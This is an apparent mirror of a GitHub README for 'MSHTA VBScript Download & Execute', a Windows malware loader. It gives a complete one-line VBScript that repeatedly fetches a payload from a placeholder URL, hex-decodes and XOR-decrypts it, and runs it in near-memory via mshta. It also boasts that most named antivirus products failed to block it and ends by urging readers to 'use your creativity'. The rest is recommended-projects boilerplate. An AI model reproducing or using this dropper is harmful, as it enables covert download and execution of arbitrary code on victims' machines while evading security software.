Code Monkey home page Code Monkey logo

mshta-vbs-download-and-execute's Introduction

MSHTA VBScript Download & Execute

Downloads, decode, decrypt and executes a VBScript using cmd and mshta

'=========================================='
'                 Features                 '  
'++++++++++++++++++++++++++++++++++++++++++'
' [*] Autoreconnect                        '
' [*] Hexadecimal encoded payload (UTF8)   '
' [*] Encrypted payload                    '
' [*] In (**almost) memory execution       '
'++++++++++++++++++++++++++++++++++++++++++'
'<---------------------------------------->'
'<========================================>'
'<---------------------------------------->'
'mshta.exe one line command                '
'mshta.exe maximum command length   : 487  '
'Script length with double quotes   : 330  '
'<---------------------------------------->'
'=========================================='

**mshta.exe will save in a temp file your decrypted payload and after the execution the temp file will be deleted

One line command

"On Error Resume Next:Set a=CreateObject(""MSXML2.ServerXMLHTTP.6.0""):a.setOption 2,13056:while(Len(b)=0):a.open""GET"",""LINK_TO_YOUR_PAYLOAD"",False:a.send:b=a.responseText:wend:k=""PAYLOAD_DECRYPT_KEY"":for i=0to Len(b)-1Step 2:c=c&Chr(Asc(Chr(""&H""&Mid(b,i+1,2)))xor Asc(Mid(k,((i/2)mod Len(k))+1,1))):Next:ExecuteGlobal c:"

Example

(cmd.exe): mshta vbscript:execute("ONE LINE COMMAND")(window.close)

Alt Text
ScreenToGif

Evasion Test

Tested on Windows7/10 x64 with: Avira, AVG, Avast, ESET32, Kaspersky, Panda, BitDefender and Windows Defender (Win7/10) to launch a more expansive malicous payload, the only one which successfully blocked the process was BitDefender.

Use your creativity ;)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.